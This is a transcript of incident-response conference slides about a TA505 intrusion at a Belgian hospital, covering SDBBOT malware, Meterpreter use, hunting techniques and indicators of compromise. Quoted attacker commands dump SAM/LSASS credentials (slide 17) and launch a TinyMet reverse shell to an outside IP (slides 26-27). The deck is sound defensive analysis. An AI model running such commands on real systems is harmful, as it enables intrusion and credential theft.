another threat actor day
TRANSCRIPT
![Page 1: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/1.jpg)
CERT-XLM - Computer Security Incident Response Team
Another threat actor day
Virus Bulletin – 2020
TLP:WHITE
![Page 2: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/2.jpg)
TLP:WHITE
• Who are we
• The case
• Incident response
• Hunting for SDBBOTs
Planning
Virus Bulletin 2020 2
![Page 3: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/3.jpg)
TLP:WHITE
• Paul Jung• CSIRT Team leader
• +20 Years in the Infosec field
• A couple of time speaker at InfoSec conference's
• : @_ _Thanat0s _ _
• Excellium Services CSIRT• CERT-XLM
• Incident response• Luxembourg
• Belgium
• Senegal
• Ivory Coast
Who am I / Who are we ?
Virus Bulletin 2020 3
![Page 4: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/4.jpg)
TLP:WHITE
The case
Virus Bulletin 2020 4
![Page 5: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/5.jpg)
TLP:WHITE
• Context• December 2019
• Belgian Hospital
• Symptoms
Breach Analysis
Virus Bulletin 2020 5
![Page 6: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/6.jpg)
TLP:WHITE
• Massive mail phishing campaign
• 08/11/2019 First phishing campaign
• 13/11/2019 Second phishing campaign• Delivery to 120 mailboxes
• From “marketing <[email protected]>“ ([email protected])
• Originated from a Russian University.
Delivery
Virus Bulletin 2020 6
![Page 7: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/7.jpg)
TLP:WHITE
Delivery
Virus Bulletin 2020 7
No document in attachmentLink to hxxp://merky.de/30rsjyUrl shortener to hxxps://dl2.box-cnd.com/?&qzjou=ISUsa3
![Page 8: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/8.jpg)
TLP:WHITE
• The link contains a macro enabled document
• Executed by a user back from holidays• 15 days after the phishing
• The document contains two binaries• 32 & 64 bits PE DLL droppers named GET2
Exploitation
Virus Bulletin 2020 8
dl2.box-cnd.com workstation
![Page 9: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/9.jpg)
TLP:WHITE
• GET2 reports to microsoft-hub-us.com• Hostname
• Username
• Version
• Running processes
• Receive and Load another payload
Exploitation
Virus Bulletin 2020 9
dl2.box-cnd.com workstation
![Page 10: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/10.jpg)
TLP:WHITE
• SDBBOT is a Fileless malware• Simple persistence
• Stored in registry
• Random name/location
• PE Lower AV detection.
• 1 different loader by infected workstation.
Command & Control
Virus Bulletin 2020 10
Run key in current user hive
stage 1:xrbvajc.dll stored
on the disk
stage 2: JVC registry key
with a PE embedded
Backdoor hidden in stage 2 is executed
![Page 11: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/11.jpg)
TLP:WHITE
• SDBBOT stealth persistence
Command & Control
Virus Bulletin 2020 11
Run key in current user hive
stage 1:xrbvajc.dll stored
on the disk
stage 2: JVC registry key
with a PE embedded
Backdoor hidden in stage 2 is executed
LauncherUID
HKEY_CURRENT_USER\Software\Microsoft\Windons\CurrentVersion\Run[random].dll rundll32 ’’c:\Users\[redacted]\AppData\Roaming\[random].dll’’ #1
![Page 12: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/12.jpg)
TLP:WHITE
• SDBBOT stealth persistence
Command & Control
Virus Bulletin 2020 12
Run key in current user hive
stage 1:xrbvajc.dll stored
on the disk
stage 2: JVC registry key
with a PE embedded
Backdoor hidden in stage 2 is executed
LauncherUID
Copyright (C) Microsoft Corporation
HKEY_CURRENT_USER\Software\Microsoft\[RANDOM 3] \[RANDOM 1]
![Page 13: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/13.jpg)
TLP:WHITE
Registry
Shellcode
• SDBBOT stealth persistence
Command & Control
Virus Bulletin 2020 13
Run key in current user hive
stage 1:xrbvajc.dll stored
on the disk
stage 2: JVC registry key
with a PE embedded
Backdoor hidden in stage 2 is executed
Launcher
CompressedPE
Decoy
HKEY_CURRENT_USER\Software\Microsoft\[RANDOM 3] \[RANDOM 1]
![Page 14: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/14.jpg)
TLP:WHITE
• SDBBOT Capacity• C&C to drm-server-booking.com
• Report external IP (fetched from ip-api.com)
• Download files
• Perform file operations
• Commands Execution
• Streaming of the screen content
• Network connections forwarding
• Perform reboot
Command & Control
Virus Bulletin 2020 14
workstationdrm-server-booking.com
![Page 15: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/15.jpg)
TLP:WHITE
• MS17-10 Vulnerability used to perform lateral movement/privileges escalations• First pivot on Domain Controller
• Evidences show domain administrator privileges gained 1h20 after first connection
• Persistence sets with user “support” as DC admin group.
Action on Objectives
Virus Bulletin 2020 15
Patient 0 Domain controller
![Page 16: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/16.jpg)
TLP:WHITE
• Attackers used Meterpreter for offensive actions:• Usage of a repackaged Meterpreter stager named TinyMet, locally named wsus.exe.
• Spread using smbexec
• Connections in the 91.214.124.0/24 subnet• AS210119, IPs geolocalized in Seychelles, AS registered originally in Ukraine
Action on Objectives
Virus Bulletin 2020 16
workstations91.214.124.5
![Page 17: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/17.jpg)
TLP:WHITE
• Extraction of the domain database ~20h after access on DC• Retrieval of SAM database
• Dump of the process LSASS
• Execution of PWDUMP tools
Action on Objectives
Virus Bulletin 2020 17
%COMSPEC% /Q /c echo reg.exe save hklm\sam C:\Intel\sam ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c
%TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo reg.exe save hklm\security C:\Intel\security ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q
/c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo reg.exe save hklm\system C:\Intel\system ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c
%TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo C:\Intel\procdump.exe -accepteula -ma lsass.exe lsass.dmp ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat &
%COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
%COMSPEC% /Q /c echo C:\Intel\pwdump.exe > C:\Intel\pw ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c
%TEMP%\execute.bat & del %TEMP%\execute.bat
![Page 18: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/18.jpg)
TLP:WHITE
• Deployment for persistence.• More than 50 servers/workstations compromised.
• Deployment at system level.
• Using Meterpreter with admin credential
• Using smbexec leaving a service.
Action on Objectives
18
workstation
Virus Bulletin 2020
![Page 19: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/19.jpg)
TLP:WHITE
Attribution
Virus Bulletin 2020 19
%COMSPEC% /Q /c echo ping google.ca ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat &
%COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
![Page 20: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/20.jpg)
TLP:WHITE
Attribution
Virus Bulletin 2020 20
%COMSPEC% /Q /c echo ping google.ca ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat &
%COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat
Source : http://www.ottawalife.com
![Page 21: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/21.jpg)
TLP:WHITE
Attribution
Virus Bulletin 2020 21
MetasploitCC
TA505
![Page 22: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/22.jpg)
TLP:WHITE
• Attribution sources• TLP Amber
• Collected artefacts
• ANSSI Report – 11/2019 - INFORMATIONS CONCERNANT LE RANÇONGICIEL CLOP
• TLP White• ASEC – Q32019 – Report vol.96
• ProofPoint 10/2019 - Report – TAT505 Distributes New SDBbot Remote access
• ATT&CK – All registered report
Attribution to TA505/G0092
TA505 is a financially motivated threat group that has been active since at least 2014.
The group is known for frequently changing malware and driving global trends in criminal malware distribution.
Using phishing or malware for initial breach.
Attribution
Virus Bulletin 2020 22
![Page 23: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/23.jpg)
TLP:WHITE
• Attribution• Paper from Asec (October 19)
• Same backdoor: SDBBot.
• Same loader name: wsus.exe
Attribution
Virus Bulletin 2020 23
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf
![Page 24: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/24.jpg)
TLP:WHITE
Incident response
Virus Bulletin 2020 24
![Page 25: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/25.jpg)
TLP:WHITE
Incident response
Virus Bulletin 2020 25
1 Week + 3 Days
Wee
ken
d
Wee
ken
d
• Big environment• No IR preparation
• Flat network
• Hospital, means heterogeneity
![Page 26: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/26.jpg)
TLP:WHITE
26
Incident response
• Easy to spot• Artefact created by smbexec
• BTOBTO services
• C:\__output folders
• Listening meterpreter
• 8080 listen
• Evtx
• Remote folders scan
• Nmap
Virus Bulletin 2020 26
Metasploit
%COMSPEC% /C echo C:\Windows\wsus.exe 0 91.214.124.15 443 ^>
%SYSTEMDRIVE%\WINDOWS\Temp\iaetRnAqpruNtWFZ.txt >
\WINDOWS\Temp\wmCiqaHkZzuHNNMT.bat &
![Page 27: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/27.jpg)
TLP:WHITE
27
Incident response
Virus Bulletin 2020 27
TinyMet
https://github.com/SherifEldeeb/TinyMet
%COMSPEC% /C echo C:\Windows\wsus.exe 0 91.214.124.15 443 ^>
%SYSTEMDRIVE%\WINDOWS\Temp\iaetRnAqpruNtWFZ.txt >
\WINDOWS\Temp\wmCiqaHkZzuHNNMT.bat &
0: reverse_tcp
1: reverse_http
2: reverse_https
3: bind_tcpIP & Port
![Page 28: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/28.jpg)
TLP:WHITE
28
Incident response
Virus Bulletin 2020 28
Patient 0
Patient 0
Sdbbot CC
MeterpreterCC
Servers
Servers and workstations
TA505
![Page 29: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/29.jpg)
TLP:WHITE
29
Incident response
Virus Bulletin 2020 29
Fears
• Still ~300 hosts vulnerable to MS17 10
• When CLOP will be launched ?
• Is SDBBOT using always the same CC
Actions
• Internet down for servers
• Sinkholing of known bad Ips
• Detections of « meterpreted » hosts.
How to detect SDBBOT ?Unique hash per sampleLocated in registry with random name.
![Page 30: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/30.jpg)
TLP:WHITE
30
Incident response
• Analysis of the compromised hosts• Detection of the backdoors
• File based detection
• Registry based detection
Virus Bulletin 2020 30
SDBBOT
![Page 31: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/31.jpg)
TLP:WHITE
• SDBBOT Weaknesses• Report external IP (fetched from ip-api.com)
• Hardcoded UA
Incident response
Virus Bulletin 2020 31
Workstation Ip-api.com
![Page 32: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/32.jpg)
TLP:WHITE
32
Incident response
• Analysis of the compromised hosts• Detection of the backdoors
• File based detection
• Registry based detection
• External IP fetching
Virus Bulletin 2020 32
SDBBOT
![Page 33: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/33.jpg)
TLP:WHITE
• SDBBOT Weaknesses• Communication is binary
• Usage of port 443 but no SSL
• Handshake is visible « DEC0 »
Incident response
Virus Bulletin 2020 33
workstationdrm-server-booking.com
0000DECO
0000DECO
![Page 34: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/34.jpg)
TLP:WHITE
• SDBBOT Weaknesses• Configuration can be overridden
• Ip.txt
Command & Control
Virus Bulletin 2020 34
drm-server-booking.com
Whereeveriwant.com
![Page 35: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/35.jpg)
TLP:WHITE
35
Incident response
• In memory detection on servers.• Injected in winlogon.exe
• No other backdoor discovered.
• No other CC discovered.
Virus Bulletin 2020 35
SDBBOT on some servers
Yara:rule sdbbot { meta: description = "Get SDBBOT conf" strings: $re0 = /Hosts=[a-zA-z0-9\-.]{5,32}/condition: all of ($re*) }
![Page 36: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/36.jpg)
TLP:WHITE
36
Incident response
• Analysis of the compromised hosts• Solutions for detection of the backdoors
• File based detection
• Registry based detection
• External IP fetching
• Network detection
• Configuration overridden
• Scan in memory
Virus Bulletin 2020 36
SDBBOT
![Page 37: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/37.jpg)
TLP:WHITE
37
Incident response
Virus Bulletin 2020 37
TA505 is Fast
![Page 38: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/38.jpg)
TLP:WHITE
Hunting for SDBBOT
Virus Bulletin 2020 38
![Page 39: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/39.jpg)
TLP:WHITE
• Fileless malware
• Unique launcher
Hunting for SDBBOT
Virus Bulletin 2020 39
• Rare on public sandboxes
• Hard to spot samples in the wild.
How to spot them ?
![Page 40: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/40.jpg)
TLP:WHITE
• SDBBOT Weaknesses• Usage of port 443 but no SSL
• Handshake is visible « DEC0 »
• Need to send 4 Bytes & analyse response
Hunting for SDBBOT
Virus Bulletin 2020 40
sdbbotdrm-server-booking.com
0000DECO
0000DECO
![Page 41: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/41.jpg)
TLP:WHITE
• SDBBOT Weaknesses• Usage of port 443 but no SSL
• Handshake is visible « DECO »
• Need to send 4 Bytes & analyse response
Hunting for SDBBOT
Virus Bulletin 2020 41
sdbbotdrm-server-booking.com
0000DECO
0000DECO
![Page 42: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/42.jpg)
TLP:WHITE
• Hostnames Similarities in drop & bot• news-server-drm-google.com
• drm-server13-login-microsoftonline.com
• drm-server-booking.com
• microsoft-hub-us.com
• …
• Hostnames reuse
Hunting for SDBBOT
Virus Bulletin 2020 42
• Windows-msd-update.com
• Windows-fsd-update.com
• Windows-sys-update.com
• Windows-se-update.com
• Windows-en-us-update.com
• update365-office-ens.com
• update365-update-en-gb.com
• office365-update-eu.com
![Page 43: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/43.jpg)
TLP:WHITE
• Label splitting
Hunting for SDBBOT
Virus Bulletin 2020 43
drm
server
microsoft
office
cloud
Generate
Drm-serverServer-drmDrm-server-cloudServer-drm-cloudCloud-drm-server…
ResolveAutonomous
SystemNumber
NSE
~120 labels ~397 AS ~12 Sdbbot
![Page 44: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/44.jpg)
TLP:WHITE
• Sdbbot is invisible to shodan.io
SDBBOT Hosts strangeness
Virus Bulletin 2020 44
Operating systems• Ubuntu 18.4• Ubuntu 16.4• Debian 10
![Page 45: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/45.jpg)
TLP:WHITE
• deployed everywhere.
SDBBOT Infrastructure
Virus Bulletin 2020 45
![Page 46: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/46.jpg)
TLP:WHITE
SDBBOT Infrastructure
Virus Bulletin 2020 46
![Page 47: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/47.jpg)
TLP:WHITE
IOC
Virus Bulletin 2020 47
SDBBOTS Ip’s190.211.254.224192.161.167.16523.152.0.152192.52.167.23392.38.135.217158.255.208.148158.255.208.16851.38.82.162212.83.46.170212.83.46.170190.211.254.224
Used ToolsTinymetSmbexecProcdumpPwdumpMeterpreterGET2Sdbbot
SDBBOT’s Hostnameseu-global.comauxin-box.comdrm-google-analtyic.comdrm-server-booking.comdrm-server13-login-microsoftonline.comeu-global-online.comfacebook-drm-server3.comjp-microsoft-store.comstatic-google-analtyic.comnews-server-drm-google.com
Domains alleged to TA505att-download.comauxin-box.combox-cnd.combox-en-au.comcdn-box.comcdn-downloads.comcdn-onedrive-live.comclients-share.comclietns-download.comclouds-cdn.comclouds-doanload-cnd.comclouds-share.comcloud-store-cnd.comdl-icloud.com
dl-sharefile.comdl-sync.comdownload-cdn.comdownload-shares.comdrm-google-analtyic.comdrm-server13-login-microsoftonline.comdrm-server-booking.comdyn-downloads.comeu-global.comeu-global-online.comfacebook-drm-server3.comfile-downloads.comfileshare-cdns.comfileshare-storage.comgeneral-lcfd.comget-downloads.comgetlink-service.comglobal-logic-stl.comglr-ltd.comgoogledrive-en.comgoogledrive-eu.comhome-storages.comint-download.cominteger-ms-home.cominto-box.comi-sharecloud.comjp-microsoft-store.comlive-cnd.comlive-en.comlive-msr.com
live-msr.commainten-ferrum.commicrosoft-cnd.commicrosoft-cnd-en.commicrosoft-home-en.commicrosoft-hub-us.commicrosoft-live-us.commicrosoft-sback-server.commicrosoft-store-drm-server.commicrosoft-store-en.commicrosoft-ware.comms-break.comms-en-microsoft.comms-global-store.comms-home-store.commsonebox.comms-rdt.comms-upgrades.comoffice365-update-eu.comonedrive-cdn.comonedrive-download.comonedrive-download-en.comonedrive-live-en.comonedrive-sdn.comonedrives-en-live.comone-drive-storage.comonehub-en.comowncloud-cnd.comreselling-corp.comselling-group.comshare-clouds.com
shared-cnd.comshared-downloading.comshare-downloading.comsharefile-cnd.comsharefile-en.comsharefiles-download.comshares-cdns.comshares-cloud.comsharespoint-en.comshare-stores.comshr-links.comstat-downloads.comstatic-downloads.comstatic-google-analtyic.comstore-in-box.comstt-box.comstudio-stlsdr.comtnrff-home.comupdate365-office-ens.comwindows-en-us-update.comwindows-fsd-update.comwindows-msd-update.comwindows-office365.comwindows-se-update.comwindows-sys-update.comwindows-wsus-en.comwindows-wsus-eu.comwpad-home.comxbox-en-cnd.com
![Page 48: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/48.jpg)
TLP:WHITE
TTP
Virus Bulletin 2020 48
Att&ck ReferencesSpear Phishing Link https://attack.mitre.org/techniques/T1192/User Execution https://attack.mitre.org/techniques/T1204/Application Shimming https://attack.mitre.org/techniques/T1138/Registry run keys https://attack.mitre.org/techniques/T1060/Rundll32 https://attack.mitre.org/techniques/T1085/Exploitation for privilege escalation https://attack.mitre.org/techniques/T1068/Process Injection https://attack.mitre.org/techniques/T1055/Credential dumping https://attack.mitre.org/techniques/T1003/Commonly used port https://attack.mitre.org/techniques/T1043/Exfiltration over CC Channel https://attack.mitre.org/techniques/T1041/
![Page 49: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/49.jpg)
TLP:WHITE
References
Virus Bulletin 2020 49
● https://github.com/SherifEldeeb/TinyMet
● https://malpedia.caad.fkie.fraunhofer.de/actor/ta505
● https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-
Compatibility-Shims-wp.pdf
● https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-
downloader
● https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
● https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104
● Twitter @AdamTheAnalyst
● Twitter @stoerchl
![Page 50: Another threat actor day](https://reader034.vdocument.in/reader034/viewer/2022042211/6259516b0f022652f03762f1/html5/thumbnails/50.jpg)
TLP:WHITE
Virus Bulletin 2020
Virus Bulletin 2020 50